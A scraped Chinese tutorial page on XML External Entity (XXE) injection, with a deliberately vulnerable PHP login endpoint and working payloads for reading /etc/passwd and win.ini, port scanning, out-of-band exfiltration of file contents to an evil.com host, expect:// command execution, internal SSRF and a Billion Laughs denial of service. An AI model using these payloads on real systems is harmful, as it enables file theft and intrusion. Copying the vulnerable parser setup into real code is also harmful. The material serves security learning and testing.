2. 程式人生 > >4.XXE (XML External Entity Injection)

4.XXE (XML External Entity Injection)

阿新 發佈:2018-08-10
any 外部實體 nal libxml 挖掘 lan dddddd php 尋找

XXE (XML External Entity Injection)

0x01 什麽是XXE

XML外部實體註入
若是PHP,libxml_disable_entity_loader設置為TRUE可禁用外部實體註入

0x02 XXE利用

簡單文件讀取

基於file協議的XXE攻擊

XMLInject.php

<?php
# Enable the ability to load external entities
libxml_disable_entity_loader (false);

$xmlfile = file_get_contents(‘php://input‘);
$dom = new DOMDocument();

# http://hublog.hubmed.org/archives/001854.html
# LIBXML_NOENT: 將 XML 中的實體引用 替換 成對應的值
# LIBXML_DTDLOAD: 加載 DOCTYPE 中的 DTD 文件
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); // this stuff is required to make sure

$creds = simplexml_import_dom($dom);
$user = $creds->user;
$pass = $creds->pass;

echo "You have logged in as user $user";`?>

file_get_content(‘php://input‘)接收post數據,xml數據
XML.txt

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>`</creds>

導致可以讀出etc/passwd文件


在使用file://協議時,有以下幾種格式:

file://host/path
* Linux
 file:///etc/passwd
*  Unix
 file://localhost/etc/fstab
 file:///localhost/etc/fstab
*  Windows
 file:///c:/windows/win.ini
 file://localhost/c:/windows/win.ini
* (下面這兩種在某些瀏覽器裏是支持的)
 file:///c|windows/win.ini
 file://localhost/c|windows/win.ini

XML文檔是用PHP進行解析的,那麽還可以使用php://filter協議來進行讀取。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY content SYSTEM "php://filter/resource=c:/windows/win.ini">
]>
<root><foo>&content;</foo></root>

基於netdoc的XXE攻擊

==XML文檔是用Java解析的話,可利用netdoc

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#PCDATA)>
<!ENTITY file SYSTEM "netdoc:/sys/power/image_size">
]>
<data>&file;</data>

端口掃描

加載外部DTD時有兩種加載方式,一種為私有private,第二種為公共public

私有類型DTD加載:

<!ENTITY private_dtd SYSTEM "DTD_location">

公共類型DTD加載:

<!ENTITY public_dtd PUBLIC "DTD_name" "DTD_location">

在公共類型DTD加載的時候,首先會使用DTD_name來檢索,如果無法找到,則通過DTD_location來尋找此公共DTD。利用DTD_location,在一定的環境下可以用來做內網探測。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
    <!ENTITY portscan SYSTEM "http://localhost:3389">
]>
<root><foo>&portscan;</foo></root>

因解析器種類不同,所以針對XXE攻擊進行端口掃描需要一個合適的環境才能夠實現,例如:有明顯的連接錯誤信息。

利用DTD進行數據回顯

有時讀取文件時沒有回顯,這時可以利用DTD參數實體的特性將文件內容拼接到url中,達到讀取文件的效果。

 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE root[    
 <!ENTITY % file SYSTEM "php://fileter/convert.base64-encode/resource=c:/windows/win.ini">     
 <!ENTITY % dtd SYSTEM "http://192.168.1.100:8000/evil.dtd">    
 %dtd;     
 %send;]>
 <root></root>

evil.dtd

 <!ENTITY % payload "<!ENTITY &#x25; send SYSTEM ‘http://evil.com/?content=%file;‘>">
 %payload;

在evil.dtd中將%file實體的內容拼接到url後,然後利用burp等工具,查看url請求就能獲得我們需要的內容

遠程命令執行

需要 PHP開啟了PECL上的Expect擴展

<?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE root [
  <!ENTITY content SYSTEM "expect://dir .">
 ]>
 <root><foo>&content;</foo></root>

攻擊內網網站

<?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE root [
  <!ENTITY exp SYSTEM "http://192.168.1.103/payload">
 ]>
 <root><foo>&exp;</foo></root>

利用外部實體構造payload向內網其他機器發出請求

DDoS

最典型的案例Billion Laughs 攻擊

<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

DTD:
普通實體:DTD中定義,XML中使用,使用格式: &名;  
參數實體:DTD中定義,定義的時候要用%,DTD中使用,使用格式: %名;
普通實體和參數實體都分為內部實體和外部實體兩種,外部實體定義需要加上 SYSTEM關鍵字,其內容是URL所指向的外部文件實際的內容。  
如果不加SYSTEM關鍵字,則為內部實體,表示實體指代內容為字符串。

0x03 XXE漏洞挖掘

提交POST請求XML文件

提交一個POST請求,請求頭加上Content-type:application/xml
同時添加測試代碼

<?xml version="1.0"encoding="utf-8"?>
<test>cat</test>

通過OOB(Out-of-band)方法遠程訪問文件測試

  1. 自建一個網站開啟80端口
  2. 在測試網站提交payload,如下
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtgmlf6 [<!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/">
]>
<GeneralSearch>&dtgmlf6ent;</GeneralSearch>

3.查看網站返回內容
4.查看自建服務器訪問日誌,是否有DTD文件等請求

0x04 XXE自動化工具

XXEinjector

0x05 參考鏈接

https://b1ngz.github.io/XXE-learning-note/

http://colesec.inventedtheinternet.com/attacking-xml-with-xml-external-entity-injection-xxe/

https://security.tencent.com/index.php/blog/msg/69

http://rickgray.me/2015/06/08/xml-entity-attack-review.html

http://www.cnblogs.com/mengdd/archive/2013/05/30/3107361.html

http://www.freebuf.com/articles/web/97833.html

https://zhuanlan.zhihu.com/p/24275040

4.XXE (XML External Entity Injection)

相關推薦

4.XXE (XML External Entity Injection)

any 外部實體 nal libxml 挖掘 lan dddddd php 尋找 XXE (XML External Entity Injection) 0x01 什麽是XXE XML外部實體註入 若是PHP,libxml_disable_entity_loader設置為T

XXE: XML eXternal Entity Injection vulnerabilities

From:https://www.gracefulsecurity.com/xml-external-entity-injection-xxe-vulnerabilities/ Here’s a quick write-up on XXE, starting with how to detect t

【譯】Attacking XML with XML External Entity Injection (XXE)

macintosh file flat block inpu inject 有一種 這樣的 content 原文鏈接:Attacking XML with XML External Entity Injection (XXE) XXE:使用XML外部實體註入攻擊XML

XXE(XML External Entity attack)XML外部實體注入攻擊

導語   XXE:XML External Entity 即外部實體,從安全形度理解成XML External Entity attack 外部實體注入攻擊。由於程式在解析輸入的XML資料時,解析了攻擊者偽造的外部實體而產生的。例如PHP中的simplexml_load 預

XXE注入--XML外部實體注入(XML External Entity)

前言 很早就聽說過這個漏洞,但是在實際的環境中很少遇見,最近碰到過XXE注入漏洞,於是就來研究一下XXE注入。 XXE Injection即XML External Entity Inje

通過JAXB看XML外部實體注入(XML External Entity)

我們先使用JAXB提供的註解標記下java類和XML對映關係: package jaxb; import javax.xml.bind.annotation.XmlAccessType; import javax.xml.bind.annotation.XmlAccess

PHP解析xml文件是報錯:I/O warning : failed to load external entity

external load 有時 () 註入 ade 相同 pre war 在代碼頂部增加 libxml_disable_entity_loader(false); libxml_disable_entity_loader()作用是設置是否禁止從外部加載XML實

Spring 實戰-第四章-4.4 使用xml中聲明切面及引入新方法

cati sys epp proc oca cover tor ring tex 當不能直接接觸源碼時,同樣的不能給源碼增加註解,這時可以使用xml的方式聲明切面並引入新方法 CompactDisc接口 package main.java.soundsystem;

[Java Sprint] Spring XML Configuration : Constructor Injection Demo

pac .repo odi tps list name inject color spa Previous we see how to do Setter injection: https://www.cnblogs.com/Answer1215/p/9472117.htm

4.Spring——xml配置文件

Coding jdbc 沒有 demo 1.0 下載 才會 ica context 如果使用Maven構建項目,spring在加載xsd文件時總是先試圖在本地查找xsd文件(spring的jar包中已經包含了所有版本的xsd文件), 如果沒有找到,才會轉向去URL指定的路徑

xxe XML外部實體注入

xml,允許我們儲存和傳輸資料。也提供了DTD,允許我們進行文件型別定義,外部DTD,定義的實體可以竊取伺服器資訊,上傳至指定的伺服器上。   接下來,就模擬一下:xxe,竊取資訊伺服器資訊,上傳至指定伺服器。   1.編寫接收介面:    @RequestMapping(

架包4.0web.xml的標頭檔案

<?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.co

Mybatis 坑路4 -> 基於 XML 配置對映器2

基於 XML 配置對映器 快取 配置動態 SQL   有時候,靜態的 SQL 語句並不能滿足應用程式的需求。我們可以根據一些條件,來動態地構建 SQL 語句。   例如,在 Web 應用程式中,有可能有一些搜尋介面,需要輸入一個或多個選項,然後根據這些

XXE-XML實體注入

XML實體注入? 為什麼稱為XML實體注入=XXE了? 首先,要了解xml文件的構建模組 所有的 XML 文件(以及 HTML 文件)均由以下簡單的構建模組構成:元素、屬性、實體、PCDATA、CDATA 簡單對這幾個模組解釋 1,元素 元素是 XML 以及 HTML 文件的主要構建模組,元

4. 使用XML來配置Spring對物件的管理

  之前我們看了如何使用註解配置spring的功能,那麼現在我們再看一下如何使用xml配置spring。   為了方便展示,筆者再新建一個專案,過程就不贅述。     新專案建好後,我們在main的java目錄下,和之前一樣,建一個名為hello的包

SSM-4 web.xml 及相關spring配置檔案

建立maven工程,配置好pom,接下來就是web.xml配置。 這個地方走過許多彎路,springmvc相關配置其實不多,理清相互的關係即可。初次配置,建議功能一個一個加,或者將檔案拆分,一部分一部分新增,看看執行tomcat後是否有錯。   一次性配置好,經常查錯查半

JAVA 與 MyCat(4XML解析詳解

通過mycat來學習java了^^。 前一篇講到了load方法: private void load(String dtdFile, String xmlFile) { InputStream dtd = null; InputStream xml =

4.mapper.xml對映檔案詳解

1.parameterType(輸入型別) parameterMap已經被廢棄,這裡不做討論. 先了解:#{}與${}的使用 #{}實現的是向prepareStatement中的預處理語句中設定引數值,sql語句中#{}表示一個佔位符即?。 使用佔位符#

Spring Security 4.X xml配置重定向

<!-- 後臺許可權控制 @PreAuthorize --> <global-method-security pre-post-annotations="enabled" /> <form-login login-page="/login

4XML架構集合

< xmlnamespace prefix ="st1" ns ="urn:schemas-microsoft-com:office:smarttags" />11.4.1什麼是XML架構